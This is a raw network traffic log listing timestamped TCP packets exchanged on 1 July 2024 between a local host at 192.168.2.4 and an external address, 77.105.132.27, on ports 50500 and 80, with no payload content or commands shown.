Jul 1, 2024 09:16:12.033806086 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033823013 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033830881 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033839941 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033893108 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033900976 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033910990 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.033926964 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034090042 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034099102 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034106970 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034116030 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034128904 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034183979 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034192085 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034202099 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034213066 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034267902 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034276962 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034286022 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.034293890 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.048365116 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.057398081 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.111830950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.116729021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.116800070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.117019892 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.122550011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.799442053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.799504995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.808298111 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.813184977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007853031 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007882118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007898092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007908106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007917881 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007916927 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.007936954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007947922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007958889 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.007961035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007972002 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.007977962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.008007050 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.008027077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.008121967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.008261919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.012840986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.012968063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.012985945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.013015032 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.013062000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.104675055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.104688883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.104707003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.104737043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.104763985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.104804039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.104815960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.104825974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.104849100 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.104888916 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.105231047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105242014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105277061 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.105488062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105531931 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.105597019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105607986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105619907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105631113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105638027 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.105664968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.105710030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105720997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.105746031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.106476068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.106487989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.106506109 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.106519938 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.106543064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.106550932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.106559992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.106589079 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.107084990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.107131004 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.107150078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.107167959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.107178926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.107184887 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.107188940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.107206106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.107224941 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.203710079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203732967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203746080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203758955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203798056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203800917 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.203811884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203824997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203838110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203840017 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.203849077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203861952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203864098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.203886986 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.203903913 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.203934908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.203972101 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.204523087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204535961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204546928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204579115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.204608917 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.204724073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204766035 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.204766989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204778910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204801083 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.204821110 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.204889059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204900980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204914093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204924107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.204932928 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.204965115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.204996109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.205010891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205043077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.205588102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205600977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205611944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205645084 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.205671072 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.205688000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205699921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205710888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205724001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205734968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.205761909 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.205807924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205821037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.205867052 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.206494093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206557035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206568956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206574917 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.206593037 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.206609964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.206665039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206676960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206687927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206700087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206713915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.206741095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.206785917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206799984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.206840038 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.207551003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.207614899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.300895929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.300962925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.300992966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301006079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301012993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301031113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301043034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301048040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301054955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301106930 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301120996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301156998 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301177025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301213980 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301217079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301229000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301258087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301261902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301269054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301292896 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301318884 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301470995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301507950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301556110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301568031 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301608086 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301616907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301629066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301640034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301651001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301651955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301665068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301680088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301704884 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301815033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301826000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301836014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301847935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.301861048 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.301896095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.302190065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302244902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.302292109 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302303076 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302341938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302354097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302355051 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.302365065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302375078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302391052 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.302412987 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.302506924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302517891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302530050 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302561045 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.302577972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.302720070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302731037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302742958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.302774906 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.302803040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.303365946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303378105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303390026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303419113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.303436995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.303498030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303510904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303522110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303529978 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.303534985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303567886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.303600073 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.303644896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303656101 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303675890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303687096 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303704023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303703070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.303718090 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.303736925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.303762913 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.304095984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304153919 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304164886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304202080 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.304214001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.304253101 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304265022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304275990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304286003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304302931 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.304337025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.304441929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304451942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304462910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304476976 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304491043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.304501057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304512978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.304517984 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.304541111 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.304554939 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.305217981 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.305262089 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.305401087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.305440903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.305532932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.305571079 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.306365013 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.306421041 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.306516886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.306538105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.306579113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.395211935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.395227909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.395243883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.395256042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.395267010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.395283937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.395394087 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.395457029 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.397814035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.397901058 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.397969007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.397979021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398008108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398128033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398139000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398150921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398169994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398192883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398269892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398281097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398292065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398303032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398310900 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398325920 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398355007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398407936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398420095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398431063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398447990 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398462057 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398531914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398544073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398554087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398566008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398572922 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398602962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398627043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398647070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398658037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398670912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398682117 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398703098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398718119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398771048 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398782969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398794889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.398813963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.398844004 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399044037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399055958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399066925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399077892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399090052 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399092913 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399122953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399137020 CEST	49752	80	192.168.2.4	77.105.132.27
